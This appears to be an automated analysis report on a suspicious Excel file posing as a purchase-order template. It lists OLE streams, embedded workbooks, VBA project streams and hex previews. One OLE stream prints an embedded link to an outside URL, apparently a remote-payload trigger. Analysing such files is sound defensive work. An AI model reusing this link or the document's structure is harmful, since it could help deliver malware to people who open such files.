Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0067A7C9/Package, File Type: Microsoft Excel 2007+, Stream Size: 12479

General
Stream Path:	MBD0067A7C9/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	12479
Entropy:	7.09513886571729
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a7 95 f9 99 84 01 00 00 14 06 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0067A7CA/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD0067A7CA/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0067A7CA/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	MBD0067A7CA/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.701136490257069
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00

Stream Path: MBD0067A7CA/\x5SummaryInformation, File Type: data, Stream Size: 220

General
Stream Path:	MBD0067A7CA/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	220
Entropy:	3.372234242231489
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: MBD0067A7CA/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	MBD0067A7CA/MBD0018D4CE/\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.5689955935892812
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0067A7CA/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4

General
Stream Path:	MBD0067A7CA/MBD0018D4CE/\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	4
Entropy:	0.8112781244591328
Base64 Encoded:	False
Data ASCII:	. . . .
Data Raw:	00 00 03 00

Stream Path: MBD0067A7CA/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671

General
Stream Path:	MBD0067A7CA/MBD0018D4CE/Contents
CLSID:
File Type:	Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
Stream Size:	197671
Entropy:	6.989042939766534
Base64 Encoded:	True
Data ASCII:	C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0067A7CA/MBD0068D442/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD0067A7CA/MBD0068D442/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0067A7CA/MBD0068D442/Package, File Type: Microsoft Excel 2007+, Stream Size: 26243

General
Stream Path:	MBD0067A7CA/MBD0068D442/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	26243
Entropy:	7.635433729726103
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0067A7CA/MBD007203CB/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD0067A7CA/MBD007203CB/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0067A7CA/MBD007203CB/\x5DocumentSummaryInformation, File Type: data, Stream Size: 248

General
Stream Path:	MBD0067A7CA/MBD007203CB/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	248
Entropy:	3.0523231150355867
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: MBD0067A7CA/MBD007203CB/\x5SummaryInformation, File Type: data, Stream Size: 256

General
Stream Path:	MBD0067A7CA/MBD007203CB/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	256
Entropy:	4.086306928392587
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c \| E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: MBD0067A7CA/MBD007203CB/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 134792

General
Stream Path:	MBD0067A7CA/MBD007203CB/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	134792
Entropy:	7.974168320310173
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a

Stream Path: MBD0067A7CA/MBD007203CB/_VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 468

General
Stream Path:	MBD0067A7CA/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	468
Entropy:	5.269289820125323
Base64 Encoded:	True
Data ASCII:	I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
Data Raw:	49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: MBD0067A7CA/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 83

General
Stream Path:	MBD0067A7CA/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	83
Entropy:	3.0672749060249043
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00

Stream Path: MBD0067A7CA/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2486

General
Stream Path:	MBD0067A7CA/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2486
Entropy:	3.9244127831265385
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: MBD0067A7CA/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 536

General
Stream Path:	MBD0067A7CA/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	536
Entropy:	6.330646364694152
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
Data Raw:	01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Stream Path: MBD0067A7CA/MBD00726B69/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD0067A7CA/MBD00726B69/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0067A7CA/MBD00726B69/Package, File Type: Microsoft Excel 2007+, Stream Size: 26242

General
Stream Path:	MBD0067A7CA/MBD00726B69/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	26242
Entropy:	7.635424485665502
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0067A7CA/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 283872

General
Stream Path:	MBD0067A7CA/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	283872
Entropy:	7.743278150467805
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: MBD0067A7CB/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD0067A7CB/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0067A7CB/Package, File Type: Microsoft Excel 2007+, Stream Size: 45934

General
Stream Path:	MBD0067A7CB/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	45934
Entropy:	7.5587990853484195
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0067A7CC/\x1Ole, File Type: data, Stream Size: 488

General
Stream Path:	MBD0067A7CC/\x1Ole
CLSID:
File Type:	data
Stream Size:	488
Entropy:	4.6003105554287105
Base64 Encoded:	False
Data ASCII:	. . . . . ! * B . T . . . . . . . . . . . . \| . . . y . . . K . x . . . h . t . t . p . s . : . / . / . j . k . t . c . . . p . r . o . / . y . y . K . n . Y . 4 . ? . & . b . l . o . w . = . c . o . l . d . & . p . e . a . c . o . a . t . . . b . O 9 7 f E 4 . ^ { { z . . . . . . . . . . . . . . . . . . . . 9 . j . U . O . X . t . P . A . P . Y . d . I . e . h . q . Z . i . N . P . b . e . L . J . U . V . 7 . h . D . m . p . x . E . p . c . p . 7 . l . w . N . I . J . d . S . a . 3 . H . R . Y . f . H . T
Data Raw:	01 00 00 02 05 21 bc 2a c6 42 00 54 00 00 00 00 00 00 00 00 00 00 00 00 7c 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 78 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6a 00 6b 00 74 00 63 00 2e 00 70 00 72 00 6f 00 2f 00 79 00 79 00 4b 00 6e 00 59 00 34 00 3f 00 26 00 62 00 6c 00 6f 00 77 00 3d 00 63 00 6f 00 6c 00 64 00 26 00 70 00 65 00 61 00 63 00 6f 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 297189

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	297189
Entropy:	7.99839827592572
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . > 2 w . T . 6 . . f 2 j k . , . 5 : 6 f . ) . y r . ~ . . . . . . . . . . U . . . \\ . p . @ { 4 e . . _ . X _ a } f 2 . i . ) a 5 . n } > n . z c c A . \\ . D . P , . H 5 . i n U @ l o . . \\ I ! B . . . / a . . . . . . . = . . . m . . . . l , A Y 0 1 . . . . $ . . . . t . . . . K . . . . . D " . . . . . . . { . = . . . # ; P . . 7 . p a S S 0 @ . . . { . . . ! . " . . . . . . . . . N . . . . . . . 1 . . . ? w v ` Z : k p . i E [ m = 1 . . . ] 9 5 S
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 1d 3e 32 77 b1 0c a8 ce 54 ca d6 d4 90 36 91 10 ea 95 86 a0 a4 66 96 a3 32 6a f0 6b 00 2c ab 17 35 3a 36 84 d1 66 c4 96 29 0e 79 d9 72 c2 aa 7e 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 55 a0 e2 00 00 00 5c 00 70 00 e1 40 7b 34 8c d7 d9 65 17 94 83 c8 dc 9c 9f 92 5f c1 cc 9c ef be cb 58 5f 61

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 531

General
